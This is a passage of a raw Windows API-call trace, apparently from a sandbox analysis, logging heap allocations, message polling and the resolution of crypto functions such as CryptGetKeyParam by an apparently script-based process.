Flags=0x0, Size=0x8) returned 0x43e29c0 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0105.760] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0105.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0105.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a60 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3394) returned 0x4516010 [0105.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a20 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0105.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29d0 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0105.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ae0 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0105.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3394) returned 0x451c750 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0105.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0105.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0105.762] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0105.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0105.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac7c0 [0105.762] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0105.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0105.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0105.762] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0105.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0105.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a80 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0105.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0105.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac10 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0105.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0105.763] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0105.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0105.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0105.763] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0105.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0105.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0105.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0105.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0105.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0105.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ba0 [0105.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0105.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0105.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0105.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0105.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0105.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0105.764] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0105.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0105.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0580 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0105.765] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0105.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab38 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0105.765] PeekMessageW (in: lpMsg=0x144d8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144d8e4) returned 0 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0105.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0105.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0105.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0105.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0105.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0105.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0105.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0105.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0105.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0105.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0105.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0105.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0105.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0105.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0580 | out: hHeap=0x1780000) returned 1 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0105.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cc0 [0105.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0105.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0105.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0105.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03f0 [0105.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0105.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0105.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0105.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0105.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03f0 | out: hHeap=0x1780000) returned 1 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0105.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0105.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0105.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0105.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0105.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0105.768] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0440 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, 